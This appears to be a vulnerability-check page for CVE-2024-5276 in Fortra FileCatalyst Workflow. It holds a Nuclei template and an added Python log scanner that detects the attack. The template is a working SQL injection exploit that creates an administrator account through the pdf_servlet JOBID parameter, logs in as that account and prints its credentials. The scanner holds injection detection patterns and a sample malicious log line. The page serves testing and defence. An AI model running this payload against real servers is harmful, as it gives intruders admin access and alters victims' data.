Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection
ID: CVE-2024-5276
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli
Description
A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
YAML Source
id: CVE-2024-5276

info:
  name: Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
  reference:
    - https://www.tenable.com/security/research/tra-2024-25
    - https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0
    - https://www.fortra.com/security/advisory/fi-2024-008
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5276
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5276
    cwe-id: CWE-20
    epss-score: 0.00198
    epss-percentile: 0.57788
  metadata:
    max-request: 6
    verified: true
    fofa-query: body="FileCatalyst file transfer solution, easily transfer large files"
  tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli

variables:
  ctxpath: "workflow"
  username: "{{randstr}}"
  password: '{{randstr_2}}'
  password_enc: "{{to_upper(md5(password))}}"
  payload: "1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ENCPASSWORD, FIRSTNAME, LASTNAME, COMPANY, ADDRESS, ADDRESS2, CITY, STATE, ALTPHONE, ZIP, COUNTRY, PHONE, FAX, EMAIL, LASTLOGIN, CREATION, PREFERREDSERVER, CREDITCARDTYPE, CREDITCARDNUMBER, CREDITCARDEXPIRY, ACCOUNTSTATUS, USERTYPE, COMMENT, ADMIN, SUPERADMIN, ACCEPTEMAIL, ALLOWHOTFOLDER, PROTOCOL, BANDWIDTH, DIRECTORY, SLOWSTARTRATE, USESLOWSTART, SLOWSTARTAGGRESSIONRATE, BLOCKSIZE, UNITSIZE, NUMENCODERS, NUMFTPSTREAMS, ALLOWUSERBANDWIDTHTUNING, EXPIRYDATE, ALLOWTEMPACCOUNTCREATION, OWNERUSERNAME, USERLEVEL, UPLOADMETHOD, PW_CHANGEABLE, PW_CREATIONDATE, PW_DAYSBEFOREEXPIRE, PW_MUSTCHANGE, PW_USEDPASSWORDS, PW_NUMERRORS) VALUES('{{to_lower(username)}}', NULL, '{{password_enc}}', '{{to_lower(username)}}FirstName', '{{to_lower(username)}}LastName', '', '', '', '', '', '', '', '', '202-404-2400', '', '{{to_lower(username)}}@mydomain.local', 1714014839723, 1714013661166, 'default', '', '', '', 'full access', '', '', 1, 0, 0, 0, 'DEFAULT', '0', 0, '0', 1, '', '', '', '', '', 0, 0, 0, '', 0, 'DEFAULT', 0, 1714014752270, -1, 0, NULL, 0);-- -"

http:
  - raw:
      - |
        GET /{{ctxpath}}/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: jsessionid
        regex:
          - 'logon.jsp;jsessionid=([A-Z0-9]+)'
        internal: true

  - raw:
      - |
        GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'logonAnonymous.do'
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: anonurl
        regex:
          - 'href="(.*)" class="btn btn-outline-primary" id="logonAnonymousLink"'
        internal: true

  - raw:
      - |
        GET {{anonurl}} HTTP/1.1
        Host: {{Hostname}}

  - raw:
      - |
        GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1
        Host: {{Hostname}}

  - raw:
      - |
        GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1
        Host: {{Hostname}}

    disable-cookie: true
    extractors:
      - type: regex
        part: body
        group: 1
        name: fcweb_token
        regex:
          - 'name="FCWEB.FORM.TOKEN" value="([A-Za-z0-9]+)"'
        internal: true

      - type: regex
        part: body
        group: 1
        name: jsessionid2
        regex:
          - 'logon.jsp;jsessionid=([A-Z0-9]+)'
        internal: true

  - raw:
      - |
        POST /{{ctxpath}}/logon.do HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID={{jsessionid2}}
        Content-Type: application/x-www-form-urlencoded

        FCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&

    disable-cookie: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'username/password are not correct'
          - 'Your session timed out.'
        negative: true

      - type: word
        part: body
        words:
          - '<title>FileCatalyst Workflow Administration</title>'
          - '{{to_lower(username)}}'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 490a00463044022004afd1c150937cfea2b43926d2dd2ef13a3251edca6209b8b81b6aa8fd99f0a202202ea9f47405e6fbc7fbc258833a3155c9bac8fa9ec667c820f581859cd2af0243:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template checks a FileCatalyst Workflow instance for CVE-2024-5276. Run it with the Nuclei scanner against the target URL:
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5276.yaml"
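The template above exercises one specific request shape: an anonymous logon followed by a GET to /{{ctxpath}}/servlet/pdf_servlet with a JOBID value that is not a job number. The same shape is what a defender would look for in web server logs. The following is an added example, not part of the Nuclei template or of Fortra's product: a Python scanner over combined-format access log lines that flags pdf_servlet requests whose JOBID contains SQL metacharacters or keywords, and records whether the same client reached the anonymous logon first (the unauthenticated path in the advisory). The log lines are constructed for the example, and the assumption that JOBID should be purely numeric is the example's allowlist, not a documented Workflow constraint.

```python
"""
Log-based detection for CVE-2024-5276 style requests against FileCatalyst
Workflow. Added example for this page; not part of the Nuclei template or of
Fortra's product. Assumes an Apache/nginx combined access log in front of the
Workflow context path ("workflow" by default, as in the template variables).
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3})'
)

# Tokens that have no business in a job identifier.
SQL_METACHARS = ("'", ";", "--", "/*", "*/")
SQL_KEYWORDS = ("INSERT INTO", "DOCTERA_USERS", "UPDATE ", "DELETE ")

# Constructed sample (not real traffic): one client that hits the anonymous
# logon and then sends a malformed JOBID, and one ordinary numeric request.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jun/2024:10:01:02 +0000] "GET /workflow/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Jun/2024:10:01:03 +0000] "GET /workflow/logonAnonymous.do HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Jun/2024:10:01:04 +0000] "GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS--+- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Jun/2024:10:05:00 +0000] "GET /workflow/servlet/pdf_servlet?JOBID=12345 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""


def is_wellformed_jobid(value: str) -> bool:
    """Allowlist check: treat JOBID as a plain job number.
    (Assumption made for this example; the real schema is not on the page.)"""
    return value.isdigit()


def suspicious_reasons(jobid: str) -> list:
    """Return the list of reasons a decoded JOBID value looks injected (empty if clean)."""
    reasons = []
    if not is_wellformed_jobid(jobid):
        reasons.append("non-numeric JOBID")
    if any(tok in jobid for tok in SQL_METACHARS):
        reasons.append("SQL metacharacters in JOBID")
    upper = jobid.upper()
    if any(kw in upper for kw in SQL_KEYWORDS):
        reasons.append("SQL keywords in JOBID")
    return reasons


def scan_access_log(text: str, ctxpath: str = "workflow") -> list:
    """Return one finding per pdf_servlet request whose JOBID looks injected.

    Each finding notes whether the same client IP requested the anonymous logon
    earlier in the log, which is the unauthenticated path the advisory describes.
    """
    anon_clients = set()
    findings = []
    servlet_path = f"/{ctxpath}/servlet/pdf_servlet".lower()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m["ip"], m["target"]
        parts = urlsplit(target)
        path = unquote(parts.path).lower()
        if path.endswith("/logonanonymous.do"):
            anon_clients.add(ip)
            continue
        if path != servlet_path:
            continue
        # parse_qs percent-decodes the value, so encoded quotes and semicolons are visible.
        for jobid in parse_qs(parts.query, keep_blank_values=True).get("JOBID", []):
            reasons = suspicious_reasons(jobid)
            if reasons:
                findings.append({
                    "ip": ip,
                    "time": m["ts"],
                    "status": int(m["status"]),
                    "jobid": jobid,
                    "reasons": reasons,
                    "anonymous_session": ip in anon_clients,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The 500 status on the flagged request is worth keeping in the finding: a database error on a malformed JOBID is a strong signal on its own, while a 200 on the same value would suggest the patched build's input handling. Feed real logs through `scan_access_log` with the `ctxpath` your deployment uses if it differs from the default.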